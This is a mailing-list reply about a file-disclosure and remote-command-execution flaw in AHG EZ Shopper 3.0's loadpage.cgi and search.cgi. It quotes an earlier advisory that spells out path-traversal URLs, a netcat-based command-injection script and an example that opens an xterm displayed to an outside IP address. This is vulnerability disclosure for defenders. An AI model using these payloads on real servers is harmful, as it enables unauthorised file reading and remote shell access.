Re: NSFOCUS SA2000-09 : AHG EZshopper Loadpage.cgi File ListDisclosure Vulnerability

[Marshal <marshal () MARSHAL-SOFT COM>]

I also contacted AHG about it a long time ago, it seems that they had an
update.
This update is still vuln, loadpage is possible to view any file above
the specified $root=
dir in the config file. but execution and viewing files with search is
no longer possible.
I contacted them about it, they did nothing.

But yes, this advisory is old news.

suid () SNEAKERZ ORG wrote:
> Uhh... guys i dont really mean to dis you but...
> It sometimes pays to research a bit before releasing advisories.
> Here is something i posted (to bugtraq no less) on the 28 of feb this year.
>
> k thx bye
>
> suid () suid kg - EZ Shopper 3.0 remote command execution.
>
> Software:       EZ Shopper 3.0
> URL:            http://www.ahg.com/software.htm#ezshopper
> Version:        Version 3.0
> Platforms:      Unix, NT
> Type:           CGI, Input validation problem
> Vendor status:  Notified 26/02/2000
> Date:           26/02/2000
>
> Summary:
>
>         Anyone can execute any command on the remote system with
>         the priveleges of the web server. Anyone can read any file
>         on the remote system which the webserver has access to.
>
> Vulnerability:
>
>         The perl code does no input validation and performs an
>         open() on a user supplied input.
>
> Exploit:
>
>         (1) loadpage.cgi - view any file.
>
>         Firstly using your web browser find the current path (cwd):
>
>                 http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ
>
>         You will receive an error message like:
>
>                 Cannot open file /home/www/shop/XYZ
>
>         Now simply use (example based on the above cwd):
>
>                 http://www.example.com/cgi-bin/loadpage.cgi?
> user_id=1&file=../../<path>/<file>
>
>         (2) loadpage.cgi - execute any command.
>
>         This example shell script uses netcat to communicate with a
>         HTTP proxy and exploit the script:
>
>         ------------------------CUT------------------------
>
>         #!/bin/bash
>         echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?
> user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080
>
>         ------------------------CUT------------------------
>
>         A usage example would be:
>
>                 $ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%
> 20123.123.123.123:0
>
>         (3) search.cgi - view files (retarded tho) and execute commands.
>
>         Simply replace the database field with piped commands or path/filename.
>
>                 http://www.example.com/cgi-bin/search.cgi?
> user_id=1&database=<insert here>&template=<or insert here>&distinct=1
>
>         Note if you use the database field a valid template is probably needed
>         and vice versa.
>
> Workaround:
>
>         The vendor, AHG Inc, has released a fixed version, download it from
>         their website and install the fixed version.


--
Groeten,

        Marshal

[ url  : http://www.startplaza.nu | security news & links    ]
[ url  : http://www.heknet.com    | security news & exploits ]